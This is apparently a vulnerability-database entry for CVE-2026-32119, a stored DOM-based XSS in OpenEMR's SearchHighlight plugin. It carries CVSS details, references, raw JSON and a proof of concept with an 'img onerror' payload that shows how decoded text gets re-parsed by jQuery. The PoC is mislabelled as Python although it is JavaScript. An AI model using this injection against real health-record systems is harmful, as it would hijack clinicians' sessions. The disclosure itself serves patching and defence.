Security Vulnerability Report
中文
CVE-2026-32119 CVSS 4.4 MEDIUM

CVE-2026-32119

Published: 2026-03-19 20:16:14
Last Modified: 2026-03-20 16:20:15
Source: [email protected]

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.2, DOM-based stored XSS in the jQuery SearchHighlight plugin (`library/js/SearchHighlight.js`) allows an authenticated user with encounter form write access to inject arbitrary JavaScript that executes in another clinician's browser session when they use the search/find feature on the Custom Report page. The plugin reverses server-side HTML entity encoding by reading decoded text from DOM text nodes, concatenating it into a raw HTML string, and passing it to jQuery's `$()` constructor for HTML parsing. Version 8.0.0.2 fixes the issue.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* - VULNERABLE
OpenEMR < 8.0.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Step 1: Attacker injects payload into an encounter form field // The server stores this, typically HTML encoding it (e.g., < becomes &lt;) var payload = "<img src=x onerror=alert('CVE-2026-32119')>"; // Step 2: Simulation of the vulnerable SearchHighlight.js logic // when a victim uses the search feature on the Custom Report page. // 1. The plugin reads the encoded text from the DOM // Browser decodes &lt; back to < when accessing .textContent var simulatedServerResponse = "&lt;img src=x onerror=alert('CVE-2026-32119')&gt;"; var tempDiv = document.createElement('div'); tempDiv.innerHTML = simulatedServerResponse; var decodedText = tempDiv.textContent; // decodedText is now the raw malicious HTML string // 2. The plugin concatenates the decoded text into an HTML string // and passes it to jQuery $() for parsing/highlighting var vulnerableHtmlString = "<span class='highlight'>" + decodedText + "</span>"; // 3. jQuery parses the string, executing the script $(vulnerableHtmlString).appendTo('body');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32119", "sourceIdentifier": "[email protected]", "published": "2026-03-19T20:16:13.900", "lastModified": "2026-03-20T16:20:15.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.2, DOM-based stored XSS in the jQuery SearchHighlight plugin (`library/js/SearchHighlight.js`) allows an authenticated user with encounter form write access to inject arbitrary JavaScript that executes in another clinician's browser session when they use the search/find feature on the Custom Report page. The plugin reverses server-side HTML entity encoding by reading decoded text from DOM text nodes, concatenating it into a raw HTML string, and passing it to jQuery's `$()` constructor for HTML parsing. Version 8.0.0.2 fixes the issue."}, {"lang": "es", "value": "OpenEMR es una aplicación de gestión de registros de salud electrónicos y práctica médica de código abierto y gratuita. Antes de la versión 8.0.0.2, un XSS almacenado basado en DOM en el plugin jQuery SearchHighlight ('library/js/SearchHighlight.js') permite a un usuario autenticado con acceso de escritura a formularios de encuentro inyectar JavaScript arbitrario que se ejecuta en la sesión del navegador de otro clínico cuando utilizan la función de búsqueda/encontrar en la página de Informes Personalizados. El plugin revierte la codificación de entidades HTML del lado del servidor leyendo texto decodificado de nodos de texto DOM, concatenándolo en una cadena HTML sin procesar y pasándolo al constructor `$()` de jQuery para el análisis HTML. La versión 8.0.0.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.0.2", "matchCriteriaId": "C78F19AD-BD18-4F61-8B1C-DD099DBC6D34"}]}]}], "references": [{"url": "https://github.com/openemr/openemr/commit/70a41122c6d75ebcd219ba2a2535e93a6c188151", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-q283-5j7f-r6hp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-q283-5j7f-r6hp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.